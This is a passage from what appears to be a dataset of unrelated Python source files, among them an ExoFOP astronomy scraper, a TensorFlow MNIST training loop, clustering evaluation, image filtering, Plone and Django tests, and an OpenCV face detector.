    url = 'https://exofop.ipac.caltech.edu/k2/edit_target.php?id={}'.format(epic)
    soup = BeautifulSoup(urlopen(url).read(), "html5lib")
    table = soup.find(id='myTable1')

    # ExoFOP band labels that get shortened before use as result keys.
    aliases = {
        'Kep': 'Kepler',
        'WISE 3.4 micron': 'W1',
        'WISE 4.6 micron': 'W2',
        'WISE 12 micron': 'W3',
        'WISE 22 micron': 'W4',
    }

    res = {}
    out_str = ''
    # First two table rows are headers; data rows follow.
    for row in table.findAll('tr')[2:]:
        cells = row.findAll('td')
        raw_band = cells[0].text
        band = aliases.get(raw_band, raw_band)
        vals = cells[1].text
        if PM in vals:
            # "value ± error" -> [value, error]
            line_str = ' '.join([band, '=', ','.join(vals.split(PM))])
            res[band] = list(map(float, vals.split(PM)))
        else:
            line_str = ' '.join([band, '=', vals])
            res[band] = float(vals)
        out_str += line_str + '\n'

    if savefp:
        with open(savefp, 'w') as f:
            f.write(out_str)
    if verbose:
        print(out_str)
    if return_str:
        return out_str
    return res
def get_stellar(epic, verbose=False, rstar=True, savefp=None, return_str=False):
    """Scrape stellar parameters for an EPIC target from ExoFOP.

    Defaults to the Huber et al. row if multiple rows exist. Returns a dict
    mapping short names (Teff, logg, feh[, rstar]) to [value, error] lists,
    or the formatted string when return_str is True.
    """
    PM = '±'
    url = 'https://exofop.ipac.caltech.edu/k2/edit_target.php?id={}'.format(epic)
    soup = BeautifulSoup(urlopen(url).read(), "html5lib")
    table = soup.find(id='myTable2')
    # Second row holds the column headers.
    line = table.findAll('tr')[1]
    keys = [th.text for th in line.findAll('th')]
    # Relies on the loop leaving `line` bound to the matched Huber row
    # (or, if no match, the last data row).
    for line in table.findAll('tr')[2:]:
        if 'Huber' in line.findAll('td')[-3].text:
            break
    vals = [th.text for th in line.findAll('td')]
    want = 'Teff(K) log(g) [Fe/H]'.split()
    good = 'Teff logg feh'.split()
    if rstar:
        want.append('Radius(R_Sun)')
        good.append('rstar')
    out_str = ''
    for g, w in zip(good, want):
        idx = keys.index(w)
        # "value ± error" -> "value,error"
        line_str = ' '.join([g, '=', ','.join(vals[idx].split(PM))])
        out_str += line_str + '\n'
    if savefp:
        with open(savefp, 'w') as f:
            f.write(out_str)
    if verbose:
        print(out_str)
    if return_str:
        return out_str
    res = {k: list(map(float, vals[keys.index(w)].split(PM)))
           for k, w in zip(good, want)}
    return res
def get_planets(epic):
    """
    epic : EPIC ID
    returns: cand, t0, per, d_mmag, d_ppm, tdur, rp

    Scrapes the planet-candidate table from ExoFOP and returns
    {candidate_name: {param: value, param_err: error, ...}}; empty table
    cells map to None.
    """
    PM = '±'
    url = 'https://exofop.ipac.caltech.edu/k2/edit_target.php?id={}'.format(epic)
    soup = BeautifulSoup(urlopen(url).read(), "html5lib")
    table = soup.find(id='myTable3')
    planets = {}
    for tab in table.findAll('tr')[2:]:
        res = [td.text.strip() for td in tab.findAll('td')[:7]]
        cand = res[0]
        keys = 't0, per, d_mmag, d_ppm, tdur, rp'.split(', ')
        d = {}
        for k, v in zip(keys, res[1:]):
            # BUG FIX: `v is not ''` compared identity of str objects
            # (implementation-defined for literals); use equality.
            if v != '':
                if PM not in v:
                    d[k] = float(v)
                else:
                    # "mu ± sigma" -> value plus a separate *_err entry
                    mu, sig = map(float, v.split(PM))
                    d[k] = mu
                    d[k + '_err'] = sig
            else:
                d[k] = None
        planets[cand] = d
    return planets
def get_all_links(epic, mission='k2'):
    """Return the href of every <a> tag on the target's ExoFOP page.

    Exits the process if the page cannot be fetched or yields no links.
    """
    baseurl = "https://exofop.ipac.caltech.edu/"
    webpage = baseurl + mission + "/edit_target.php?id={}".format(epic)
    try:
        # BUG FIX: the original opened the same URL twice and discarded
        # (and never closed) the first response; fetch once.
        html = urlopen(webpage)
        bsObj = BeautifulSoup(html.read(), "lxml")
    except Exception as e:
        print('Error: {}\n{} does not exist!\n'.format(e, webpage))
        sys.exit()
    links = []
    for link in bsObj.find_all('a'):
        links.append(link.get('href'))
    if len(links) == 0:
        print('No links fetched. Check EPIC number.\n')
        sys.exit()
    return links
def get_specific_ext(links, ext='csv', mission='k2'):
    """Filter *links* down to those ending in .*ext* and prefix them with
    the ExoFOP base URL for *mission*.

    Exits the process when nothing matches.
    """
    baseurl = "https://exofop.ipac.caltech.edu/"
    wanted = []
    for link in links:
        try:
            if link.split('.')[-1] == ext:
                wanted.append(baseurl + mission + '/' + link)
        except AttributeError:
            # BUG FIX (narrowed from a bare `except`): <a> tags without an
            # href yield None, which has no .split — skip those only,
            # instead of swallowing every possible error.
            pass
    if len(wanted) == 0:
        print('No links fetched with file extension={}\n'.format(ext))
        sys.exit()
    return wanted
def save_to_file(epic, urls, ext):
    """Download every URL in *urls* into ./<epic>/<ext>/, named after the
    final path component of each URL. Failed downloads are reported and
    skipped.
    """
    epic = str(epic)
    if not os.path.exists(epic):
        os.makedirs(epic)
    subfolder = os.path.join(epic, ext)
    if not os.path.exists(subfolder):
        os.makedirs(subfolder)
    print('\n----------Saving .{} files----------\n'.format(ext))
    # (Removed a dead `i` counter and commented-out alternative naming
    # scheme; files are saved under their own URL basename.)
    for url in tqdm(urls):
        fname = url.split('/')[-1]
        destination = os.path.join(subfolder, fname)
        try:
            urlretrieve(url, destination)
        except Exception as e:
            print('Error: {}\nNot saved: {}\n'.format(e, url))
    return None
|
18,759 | d90915206b80cc664c6a7aa3c48aadea71282624 | '''
Desc1:这是一个用tensorflow张量的方式实现深度网络前向传播的代码
Desc2:激活函数调用activation激活函数类中的激活函数方法
Author:SQY
DateTime:2020-7-15
'''
import tensorflow as tf
import numpy as np
from tensorflow.keras import datasets
import os
from activation import Activate

# Instantiate the project's activation-function helper class.
act = Activate()
# Silence TensorFlow's informational log output.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
# Download the MNIST data.
(x_train, y_train), (x_test, y_test) = datasets.mnist.load_data()
# Convert to tensors and scale pixel values into [0, 1].
x_train = tf.convert_to_tensor(x_train, dtype=tf.float32) / 255
y_train = tf.convert_to_tensor(y_train, dtype=tf.int32)
# Same preprocessing for the test split.
x_test = tf.convert_to_tensor(x_test, dtype=tf.float32) / 255
y_test = tf.convert_to_tensor(y_test, dtype=tf.int32)
# print("x_train:", x_train.shape, x_train.dtype)
# print("y_train:", y_train.shape, y_train.dtype)
# MNIST training images are [60000, 28, 28]; slice along the first axis
# and batch 128 samples at a time.
x_train_db = tf.data.Dataset.from_tensor_slices((x_train, y_train)).batch(128)
test_db = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(128)
# (debugging) inspect one batch:
# x_train_iter = iter(x_train_db)
# sample = next(x_train_iter)
# print("size:", sample[0].shape, sample[1].shape)
# Layer weights w[input_dims, output_dims] and biases b[output_dims]:
# w: [784, 256] -> [256, 128] -> [128, 10]; biases start at zero.
w1 = tf.Variable(tf.random.truncated_normal([784, 256], stddev=0.1))
b1 = tf.Variable(tf.zeros([256]))
w2 = tf.Variable(tf.random.truncated_normal([256, 128], stddev=0.1))
b2 = tf.Variable(tf.zeros([128]))
w3 = tf.Variable(tf.random.truncated_normal([128, 10], stddev=0.1))
b3 = tf.Variable(tf.zeros([10]))
# Forward pass per layer: h = x @ w + b.
lr = 1e-3
for epoch in range(10):  # 10 full passes over the training set
    for step, (x_train, y_train) in enumerate(x_train_db):  # one SGD update per 128-sample batch
        # Flatten the 28x28 images to vectors of length 784.
        x_train = tf.reshape(x_train, [-1, 28 * 28])
        # Record the forward pass so the loss can be differentiated
        # w.r.t. w1, b1, w2, b2, w3, b3.
        with tf.GradientTape() as tape:
            h1 = tf.matmul(x_train, w1) + b1
            # NOTE(review): the return value of act.Relu is discarded here
            # and below; unless Activate.Relu mutates its argument in place
            # (unusual for TF tensors) these calls have no effect — likely
            # intended: h1 = act.Relu(h1). Confirm against the activation
            # module.
            act.Relu(h1)
            h2 = tf.matmul(h1, w2) + b2
            act.Relu(h2)
            output = tf.matmul(h2, w3) + b3
            # Mean-squared-error loss against the one-hot encoded label.
            y_train = tf.one_hot(y_train, 10)
            loss = tf.square(y_train - output)
            loss = tf.reduce_mean(loss)
        grads = tape.gradient(loss, [w1, b1, w2, b2, w3, b3])
        # SGD update: w <- w - lr * grad. assign_sub updates the Variable
        # in place; plain `w1 = w1 - lr * grads[0]` would rebind the name
        # to a Tensor and break subsequent gradient passes.
        # w1 = w1 - lr * grads[0]
        # b1 = b1 - lr * grads[1]
        # w2 = w2 - lr * grads[2]
        # b2 = b2 - lr * grads[3]
        # w3 = w3 - lr * grads[4]
        # b3 = b3 - lr * grads[5]
        w1.assign_sub(lr * grads[0])
        b1.assign_sub(lr * grads[1])
        w2.assign_sub(lr * grads[2])
        b2.assign_sub(lr * grads[3])
        w3.assign_sub(lr * grads[4])
        b3.assign_sub(lr * grads[5])
        if step % 100 == 0:
            print("loss:", float(loss), "step:", step)
    print("epoch:", epoch)
    # Evaluate on the held-out test set (reconstructed as running once per
    # epoch): count correct predictions over all test batches.
    total_correct = 0
    total_num = 0
    for step, (x_test, y_test) in enumerate(test_db):
        x_test = tf.reshape(x_test, [-1, 28 * 28])
        h1 = tf.nn.relu(tf.matmul(x_test, w1) + b1)
        h2 = tf.nn.relu(tf.matmul(h1, w2) + b2)
        output = tf.matmul(h2, w3) + b3
        # Softmax over the logits gives per-class probabilities.
        prob = tf.nn.softmax(output, axis=1)
        # Index of the most probable class.
        pred = tf.argmax(prob, axis=1)
        # argmax returns int64; cast to int32 to match y_test.
        pred = tf.cast(pred, dtype=tf.int32)
        # Compare prediction to ground truth (1 where equal, else 0) ...
        correct = tf.cast(tf.equal(pred, y_test), dtype=tf.int32)
        # ... and count the matches in this batch.
        correct = tf.reduce_sum(correct)
        # `correct` is a tensor; convert to a Python int before summing.
        total_correct += int(correct)
        total_num += x_test.shape[0]
    # accuracy = correct predictions / total samples
    acc = total_correct / total_num
    print("acc:", float(acc))
# (debugging) range checks:
# print("x_max:", tf.reduce_max(x_train))
# print("x_min:", tf.reduce_min(x_train))
# print("y_max:", tf.reduce_max(y_test))
18,760 | a6a36ae07d9c1dc8e698c7c5fed82e7f373ee99a | from __future__ import division
from random import shuffle
import random
import pandas
def get_cluster_truth(clusters_truth_file):
    """Read ground-truth clusters from an open file (one space-separated
    line of patient ids per cluster) and map each patient to its cluster
    index. Reading stops at the first blank (stripped-empty) line."""
    truth = {}
    cluster_idx = 0
    while True:
        row = clusters_truth_file.readline().strip()
        if not row:
            break
        for member in row.split(" "):
            truth[member] = cluster_idx
        cluster_idx += 1
    return truth
def get_cluster_count(cluster_set, cluster_truth):
    """For each predicted cluster, count how many members carry each
    ground-truth label.

    cluster_set: iterable of clusters (iterables of patient ids).
    cluster_truth: {patient_id: truth_label}.
    Returns a list, parallel to cluster_set, of {truth_label: count} dicts.
    """
    cluster_counts = []
    for cluster in cluster_set:
        counts = {}
        for patient in cluster:
            # BUG FIX: the original rebound the loop variable `cluster`
            # here, shadowing the cluster being counted mid-iteration;
            # use a distinct name (and dict.get instead of a keys() scan).
            label = cluster_truth[patient]
            counts[label] = counts.get(label, 0) + 1
        cluster_counts.append(counts)
    return cluster_counts
def combination(number):
    """Number of unordered pairs among *number* items, i.e. C(number, 2).

    Returns 0 (int) for fewer than two items, otherwise a float because of
    true division.
    """
    if number <= 1:
        return 0
    return number * (number - 1) / 2
def claculate_TPTN(cluster_numbers):
    """Accumulate pair-counting statistics for external cluster evaluation.

    cluster_numbers: list of {truth_label: count} dicts, one per predicted
    cluster (output of get_cluster_count).

    Returns (TP, TN, FP, total):
      TP    - pairs sharing both predicted cluster and truth label
      TN    - cross-cluster, cross-label pair count; each pair is counted
              once from each side, so the caller halves it (TN /= 2)
      FP    - all intra-cluster pairs, i.e. TP plus the false positives
      total - total number of clustered items
    (Function name typo 'claculate' kept for caller compatibility.)
    """
    TP = 0
    TN = 0
    FP = 0
    total = 0
    for i in range(len(cluster_numbers)):
        total_local = 0
        for cluster in cluster_numbers[i].keys():
            total += cluster_numbers[i][cluster]
            total_local += cluster_numbers[i][cluster]
            # pairs agreeing in both prediction and truth
            TP += combination(cluster_numbers[i][cluster])
            # items in OTHER predicted clusters with a DIFFERENT truth label
            tn = 0
            for j in range(len(cluster_numbers)):
                if i != j:
                    for c in cluster_numbers[j].keys():
                        if c != cluster:
                            tn += cluster_numbers[j][c]
            TN += cluster_numbers[i][cluster] * tn
        # every pair inside predicted cluster i (true + false positives)
        FP += combination(total_local)
    return TP, TN, FP, total
def check_convergence(resi_index, patient_cluster, patient, global_patient_set, resi_distance_matrix):
    """Evict cluster members (other than the seed *patient*) whose nearest
    neighbour lies outside the cluster.

    Evicted members are also removed from *global_patient_set* so later
    seeds can re-cluster them. Mutates both collections in place.
    """
    evicted = []
    for member in patient_cluster:
        if member == patient:
            continue
        row = resi_distance_matrix[resi_index.index(member)]
        # Nearest neighbour = index of the row's minimum distance.
        nearest = resi_index[row.index(min(row))]
        if nearest not in patient_cluster:
            evicted.append(member)
    for member in evicted:
        patient_cluster.remove(member)
        global_patient_set.remove(member)
def load_diatance_matrix(distance_file_route):
    """Parse a tab-separated distance-matrix file.

    First line: header whose cells after the first are patient ids. Each
    following line: a row label followed by integer distances. Reading
    stops at the first blank line.

    Returns (matrix, size, index): matrix is a list of int rows, size the
    number of patients, index the list of patient ids.
    (Function name typo 'diatance' kept for caller compatibility.)
    """
    # PORTABILITY FIX: `file(...)` is a Python-2-only builtin; open() works
    # on both 2 and 3, and the context manager guarantees the handle is
    # closed even on a parse error.
    with open(distance_file_route) as matrix_file:
        header = matrix_file.readline().strip()
        resi_index = header.split("\t")[1:]
        size = len(resi_index)
        resi_distance_matrix = []
        line = matrix_file.readline().strip()
        while line:
            # Drop the row label, keep the integer distances.
            resi_distance_matrix.append([int(d) for d in line.split("\t")[1:]])
            line = matrix_file.readline().strip()
    return resi_distance_matrix, size, resi_index
def clustering(resi_distance_matrix, size, resi_index, distance_threshold, P, R, F, cluster_truth, clusters_result_file):
    """Run one randomized threshold-clustering pass and append its
    precision/recall/F1 to the P, R, F accumulator lists.

    Each unassigned patient (visited in shuffled order) seeds a cluster of
    all unassigned patients within distance_threshold; check_convergence
    then evicts members whose nearest neighbour is outside the cluster.
    Resulting clusters are written (space-separated, one per line) to
    clusters_result_file.
    """
    seed = random.randint(1, 200)
    # BUG FIX: the original wrote `random.seed = seed`, which REPLACED the
    # random.seed function with an int instead of seeding the generator.
    random.seed(seed)
    cluster_set = []
    global_patient_set = set()
    order = [i for i in range(size)]
    shuffle(order)
    for i in order:
        patient = resi_index[i]
        cluster = set()
        if patient not in global_patient_set:
            cluster.add(patient)
            global_patient_set.add(patient)
            # Pull in every still-unassigned patient within the threshold.
            for j in range(0, size):
                distance = int(resi_distance_matrix[i][j])
                if distance < distance_threshold and resi_index[j] not in global_patient_set:
                    cluster.add(resi_index[j])
                    global_patient_set.add(resi_index[j])
            if len(cluster) > 1:
                check_convergence(resi_index, cluster, patient, global_patient_set, resi_distance_matrix)
        if len(cluster) > 0:
            cluster_set.append(cluster)
    cluster_numbers = get_cluster_count(cluster_set, cluster_truth)
    for cluster in cluster_set:
        line = ""
        for patient in cluster:
            line += str(patient) + " "
        line += "\n"
        clusters_result_file.writelines(line)
    # Pair-counting evaluation: TN is double-counted by claculate_TPTN, so
    # halve it; FN is everything not accounted for among all pairs.
    TP, TN, FP_TP, total = claculate_TPTN(cluster_numbers)
    TN /= 2
    FN = combination(total) - FP_TP - TN
    p = TP / FP_TP
    r = TP / (TP + FN)
    f = 2 * p * r / (p + r)
    P.append(p)
    R.append(r)
    F.append(f)
# Run the clustering experiment for both the "resi" and "unresi" datasets:
# for each distance threshold, 50 random restarts, then write per-threshold
# precision/recall/F1 statistics.
for isresi in ["resi", "unresi"]:
    resi_distance_matrix, size, resi_index = load_diatance_matrix("./output_new/distance_" + isresi + ".txt")
    # PORTABILITY FIX: the Python-2-only builtin `file(...)` replaced with
    # open() (file names, including the original "statistcs" spelling, are
    # kept so downstream tooling still finds the outputs).
    clusters_result_statistics_file = open("./output_new/cluster_" + isresi + "_statistcs.txt", "w")
    clusters_truth_file = open("./output_new/0.26_100_0.01_0.018_0.05_0.75_" + isresi + ".txt")
    cluster_truth = get_cluster_truth(clusters_truth_file)
    clusters_result_file = open("./output_new/cluster_" + isresi + ".txt", "w")
    if isresi == "resi":
        distance_threshold = [10, 30, 50, 70]
    else:
        distance_threshold = [30, 60, 90, 120]
    for threshold in distance_threshold:
        P = []
        R = []
        F = []
        # 50 random restarts per threshold.
        for i in range(50):
            clustering(resi_distance_matrix, size, resi_index, threshold, P, R, F, cluster_truth, clusters_result_file)
        clusters_result_statistics_file.writelines("Distance_Threshlod:" + str(threshold) + "\n\n")
        line = " ".join(str(e) for e in P)
        clusters_result_statistics_file.writelines("precision: " + line + "\n")
        P_pd = pandas.Series(P)
        clusters_result_statistics_file.writelines("precision mean: " + str(P_pd.mean()) + "\n")
        clusters_result_statistics_file.writelines("precision std: " + str(P_pd.std()) + "\n\n")
        line = " ".join(str(e) for e in R)
        clusters_result_statistics_file.writelines("recall: " + line + "\n")
        R_pd = pandas.Series(R)
        clusters_result_statistics_file.writelines("recall mean: " + str(R_pd.mean()) + "\n")
        clusters_result_statistics_file.writelines("recall std: " + str(R_pd.std()) + "\n\n")
        line = " ".join(str(e) for e in F)
        clusters_result_statistics_file.writelines("F1: " + line + "\n")
        F_pd = pandas.Series(F)
        clusters_result_statistics_file.writelines("F1 mean: " + str(F_pd.mean()) + "\n")
        clusters_result_statistics_file.writelines("F1 std: " + str(F_pd.std()) + "\n\n")
    clusters_truth_file.close()
    clusters_result_file.close()
    clusters_result_statistics_file.close()
18,761 | 4e3e3ae7a3b436c5b24e6919504bd8f31bac39c9 | import numpy as np
import matplotlib.pyplot as plt
def conv2d(picture, filter):
    """2-D correlation of *picture* with the square, odd-sized kernel
    *filter*.

    The border (half the kernel width) is left at zero — no padding is
    applied. The kernel is applied unflipped, i.e. cross-correlation,
    which coincides with convolution for the symmetric kernels used here.
    """
    out = np.zeros(picture.shape)
    half = len(filter) // 2
    n_rows = len(picture)
    n_cols = len(picture[0])
    for r in range(half, n_rows - half):
        for c in range(half, n_cols - half):
            window = picture[r - half:r + half + 1, c - half:c + half + 1]
            out[r, c] = np.sum(window * filter)
    return out
if __name__ == '__main__':
    # Normalised 3x3 Gaussian-blur kernel.
    filterA = np.array([[1, 2, 1], [2, 4, 2], [1, 2, 1]]) / 16
    # Sharpening kernel.
    filterB = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])
    # Laplacian edge-detection kernel.
    filterC = np.array([[0, 1, 0], [1, -4, 1], [0, 1, 0]])
    pic = plt.imread('cameraman.png')
    org = np.array(pic)
    fA = conv2d(org, filterA)
    fB = conv2d(org, filterB)
    fC = conv2d(org, filterC)
    # 2x2 grid: original image plus the three filtered versions.
    plt.subplot(2, 2, 1)
    plt.imshow(org, 'gray')
    plt.title('Original')
    plt.subplot(2, 2, 2)
    plt.imshow(fA, 'gray')
    plt.title('Filter A')
    plt.subplot(2, 2, 3)
    plt.imshow(fB, 'gray')
    plt.title('Filter B')
    plt.subplot(2, 2, 4)
    plt.imshow(fC, 'gray')
    plt.title('Filter C')
    plt.show()
18,762 | 98980a00b8e976c7c027a4d14ae42f905f50841b | import pandas as pd
import numpy as np
import os
from scipy import stats
from sklearn.metrics import roc_auc_score,classification_report
import itertools
# Ensemble the per-(model, colour-space) glaucoma classifiers: majority-vote
# the binary predictions, then pick a representative risk score per sample.
out_csv = '/media/htic/Balamurali/Glaucoma_models/classification_results.csv'
src_path = '/media/htic/Balamurali/Glaucoma_models/'
test_data_len = 400
color_space = ['LAB', 'Normalized', 'PseudoDepth']
models = ['resnet152']  # ,'densenet201','resnet101','densenet169']
score_np = np.empty([test_data_len, 0])
pred_np = np.empty([test_data_len, 0])
# Change for test
is_test = False
csv_name = 'output.csv'

# Stack each ensemble member's predictions/scores as one column.
# CONSISTENCY FIX: the literal 400 previously hard-coded in every reshape
# is replaced by the test_data_len constant declared above.
for model in models:
    for color in color_space:
        csv_path = os.path.join(src_path, '{}_{}'.format(model, color), csv_name)
        pd_data = pd.read_csv(csv_path)
        file_names = pd_data['FileName'].values.reshape(test_data_len, 1)
        pred_data = pd_data['Predicted'].values.reshape(test_data_len, 1)
        score_data = pd_data['Glaucoma Risk'].values.reshape(test_data_len, 1)
        pred_np = np.hstack([pred_np, pred_data])
        score_np = np.hstack([score_np, score_data])

# Majority vote across ensemble members.
best_predict, _ = stats.mode(pred_np, axis=1)
best_predict = best_predict.astype(np.uint8)
score_np_min = np.min(score_np, axis=1).reshape(test_data_len, 1)
score_np_max = np.max(score_np, axis=1).reshape(test_data_len, 1)
zero_mask = np.where(best_predict == 0)
one_mask = np.where(best_predict == 1)
print(zero_mask[0].shape)
# NOTE(review): class 0 takes the ensemble MAX score and class 1 the MIN —
# presumably 'Glaucoma Risk' here is oriented so class 1 means low risk;
# confirm against the model outputs.
result_score = np.zeros([test_data_len, 1])
result_score[zero_mask] = score_np_max[zero_mask]
result_score[one_mask] = score_np_min[one_mask]
if is_test:
    # Local sanity check: first 40 rows are positives in the test split.
    gt = np.zeros((test_data_len, 1))
    gt[:40] = 1
    print(roc_auc_score(gt, result_score))
result = np.hstack([file_names, result_score])
df = pd.DataFrame(result)
df.to_csv(out_csv, header=['FileName', 'Glaucoma Risk'], index=False)
18,763 | 292833ef780249af66a72c804e86e2d6bded3539 | # -*- coding: utf-8 -*-
"""Test views."""
from collective.messagesviewlet.message import PseudoMessage
from imio.dms.mail.browser.viewlets import ContactContentBackrefsViewlet
from imio.dms.mail.browser.viewlets import ContextInformationViewlet
from imio.dms.mail.dmsmail import IImioDmsIncomingMail
from imio.dms.mail.testing import DMSMAIL_INTEGRATION_TESTING
from imio.helpers.content import get_object
from plone import api
from plone.app.testing import login
import unittest
class TestContactContentBackrefsViewlet(unittest.TestCase):
    """Integration tests for the contact viewlets (back-references and
    context information), run against the demo content of the DMS mail
    testing layer."""

    layer = DMSMAIL_INTEGRATION_TESTING

    def setUp(self):
        # Shorthand handles to the portal and the demo content it ships with.
        self.portal = self.layer['portal']
        self.ctct = self.portal['contacts']
        self.elec = self.ctct['electrabel']
        self.jean = self.ctct['jeancourant']
        self.imf = self.portal['incoming-mail']
        self.omf = self.portal['outgoing-mail']

    def test_backrefs(self):
        """backrefs() honours the all_backrefs_view registry switch and,
        when it is off, the current user's View permission."""
        viewlet = ContactContentBackrefsViewlet(self.elec, self.elec.REQUEST, None)
        # configure to see all refs
        api.portal.set_registry_record('imio.dms.mail.browser.settings.IImioDmsMailConfig.all_backrefs_view', True)
        self.assertListEqual([self.portal.unrestrictedTraverse(b.getPath()) for b in viewlet.backrefs()],
                             [get_object(oid='reponse7', ptype='dmsoutgoingmail'),
                              get_object(oid='reponse1', ptype='dmsoutgoingmail'),
                              get_object(oid='courrier7', ptype='dmsincomingmail'),
                              get_object(oid='courrier1', ptype='dmsincomingmail')])
        # configure to see only permitted refs
        api.portal.set_registry_record('imio.dms.mail.browser.settings.IImioDmsMailConfig.all_backrefs_view', False)
        self.assertListEqual(viewlet.backrefs(), [])
        # login to get view permission
        login(self.portal, 'encodeur')
        self.assertListEqual([b.getObject() for b in viewlet.backrefs()],
                             [get_object(oid='courrier7', ptype='dmsincomingmail'),
                              get_object(oid='courrier1', ptype='dmsincomingmail')])

    def test_find_relations(self):
        """find_relations() filters by from_attribute / source interface and
        works on organisations, persons and held positions."""
        login(self.portal, 'encodeur')
        viewlet = ContactContentBackrefsViewlet(self.elec, self.elec.REQUEST, None)
        ret = viewlet.find_relations(from_attribute='sender')
        self.assertSetEqual(set([b.getObject() for b in ret]), {get_object(oid='courrier7', ptype='dmsincomingmail'),
                                                                get_object(oid='courrier1', ptype='dmsincomingmail')})
        ret = viewlet.find_relations(from_interfaces_flattened=IImioDmsIncomingMail)
        self.assertSetEqual(set([b.getObject() for b in ret]), {get_object(oid='courrier7', ptype='dmsincomingmail'),
                                                                get_object(oid='courrier1', ptype='dmsincomingmail')})
        # call on person
        viewlet = ContactContentBackrefsViewlet(self.jean, self.jean.REQUEST, None)
        ret = viewlet.find_relations()
        self.assertSetEqual(set([b.getObject() for b in ret]), {get_object(oid='courrier3', ptype='dmsincomingmail'),
                                                                get_object(oid='courrier9', ptype='dmsincomingmail')})
        # call on held position
        agent = self.jean['agent-electrabel']
        viewlet = ContactContentBackrefsViewlet(agent, agent.REQUEST, None)
        ret = viewlet.find_relations()
        self.assertSetEqual(set([b.getObject() for b in ret]), {get_object(oid='courrier5', ptype='dmsincomingmail')})

    def test_ContextInformationViewlet(self):
        """The information viewlet warns (via PseudoMessage) when address
        fields are missing, following use_parent_address chains."""
        login(self.portal, 'encodeur')
        org_v = ContextInformationViewlet(self.elec, self.elec.REQUEST, None)
        self.assertListEqual(org_v.getAllMessages(), [])
        sorg_v = ContextInformationViewlet(self.elec['travaux'], self.elec.REQUEST, None)
        self.assertTrue(self.elec['travaux'].use_parent_address)
        self.assertListEqual(sorg_v.getAllMessages(), [])
        pers_v = ContextInformationViewlet(self.jean, self.elec.REQUEST, None)
        self.assertEqual(len(pers_v.getAllMessages()), 1)  # no address
        hp_v = ContextInformationViewlet(self.jean['agent-electrabel'], self.elec.REQUEST, None)
        self.assertTrue(self.jean['agent-electrabel'].use_parent_address)
        self.assertListEqual(hp_v.getAllMessages(), [])
        om_v = ContextInformationViewlet(get_object(oid='reponse1', ptype='dmsoutgoingmail'), self.elec.REQUEST, None)
        self.assertListEqual(om_v.getAllMessages(), [])
        # removing street from electrabel org
        self.elec.street = None
        msgs = org_v.getAllMessages()
        self.assertEqual(len(msgs), 1)
        self.assertTrue(isinstance(msgs[0], PseudoMessage))
        self.assertIn('missing address fields: street', msgs[0].text.output)
        self.assertEqual(len(sorg_v.getAllMessages()), 1)  # suborganization has missing street too
        self.assertEqual(len(hp_v.getAllMessages()), 1)  # held position has missing street too
        self.assertEqual(len(om_v.getAllMessages()), 1)  # outgoing mail has missing street too
|
18,764 | e2bd4c47b503e1a5c85ad95705d38bd9c5ba724b | from ..serializers.event import EventSerializer
from ..models.event import Event
from rest_framework.viewsets import GenericViewSet, mixins
class EventView(GenericViewSet, mixins.RetrieveModelMixin, mixins.ListModelMixin):
    """Read-only Event endpoints: list (GET collection) and retrieve
    (GET detail). No create/update/delete mixins are included."""
    serializer_class = EventSerializer
    queryset = Event.objects.all()
18,765 | 2ecf3c09ca2fa238f14eb05e331be77b66cba1a2 | # -*- coding: utf-8 -*-
"""
Created on Fri Oct 30 14:46:44 2020
@author: Ayman Al Jabri
"""
import cv2
# Default parameters passed to cv2.CascadeClassifier.detectMultiScale.
kwargs = {
    'scaleFactor': 1.1,    # image-pyramid scale step between detection passes
    'minNeighbors': 4,     # neighbouring detections required to keep a candidate
    'minSize': (50, 50),   # smallest face size considered
    'maxSize': None        # no upper size limit
}
# Bundled OpenCV frontal-face Haar cascade definition file.
fname = 'haarcascade_frontalface_default.xml'
class HAAR(cv2.CascadeClassifier):
    """Thin wrapper around cv2.CascadeClassifier that bundles default
    detection parameters and a labelled-rectangle drawing helper."""

    def __init__(self, fname):
        super(HAAR, self).__init__(fname)
        # BUG FIX: copy the module-level defaults so per-instance tweaks to
        # self.kwargs cannot mutate the shared dict (the original aliased it).
        self.kwargs = dict(kwargs)
        self.fname = fname

    def find_faces(self, img):
        """Run the cascade on a grayscale version of *img* and return the
        detected boxes (as produced by detectMultiScale)."""
        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        return self.detectMultiScale(gray, **self.kwargs)

    def draw_rect(self, frame, faces, text='Unknown!'):
        """Draw a labelled rectangle on *frame* for each box in *faces* and
        return the (mutated) frame. A None *faces* is a no-op."""
        if faces is None:
            return frame
        for box in faces:
            x, y, h, w = box
            cv2.rectangle(frame, (x, y), (x+h, y+w), (80, 18, 236), 2)
            # Filled strip above the box acts as the label background.
            cv2.rectangle(frame, (x, y), (x+h, y-15), (80, 18, 236), cv2.FILLED)
            cv2.putText(frame, text, (x + 6, y - 2), cv2.FONT_HERSHEY_DUPLEX, 0.5, (255, 255, 255), 1)
        return frame
|
18,766 | ed227ff48e8d731ddd5f4f5cb9e0fa7c8f19bcd6 | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    def getIntersectionNode(self, a: ListNode, b: ListNode) -> ListNode:
        """Return the node where singly linked lists *a* and *b* intersect,
        or None if they never do.

        Measures both lengths, advances the longer list's head by the
        difference, then walks both lists in lockstep until the SAME node
        object is reached. O(m + n) time, O(1) extra space.

        BUG FIXES: `== None` replaced with `is None`; node comparison uses
        identity (`is`) rather than `!=`; the redundant `if len_a == len_b`
        guard (always true after the alignment loops) removed.
        """
        if a is None or b is None:
            return None
        # Measure both list lengths.
        len_a, node = 0, a
        while node is not None:
            node = node.next
            len_a += 1
        len_b, node = 0, b
        while node is not None:
            node = node.next
            len_b += 1
        # Skip the longer list's extra head nodes so both cursors are the
        # same distance from the end.
        while len_a > len_b:
            a = a.next
            len_a -= 1
        while len_b > len_a:
            b = b.next
            len_b -= 1
        # Walk in lockstep; meets at the shared node, or at None.
        while a is not b:
            a = a.next
            b = b.next
        return a
|
18,767 | 2b55ae67e891cebeadbb7c05c7bf6f55142736d9 | from django.test import TestCase
from .models import Student
import datetime
from forms import StudentForm
from django.urls import reverse
from django.test import Client
# Module-level test client (note: the view tests below construct their own
# Client instances, so this one is effectively unused).
client = Client()
# Create your tests here.
class StudentTestCase(TestCase):
    """Unit tests for the Student model's full_name() helper."""

    def setUp(self):
        # An unsaved model instance is enough for full_name(); no DB write.
        self.student = Student(
            first_name = "Cynthia",
            last_name = "Anyango",
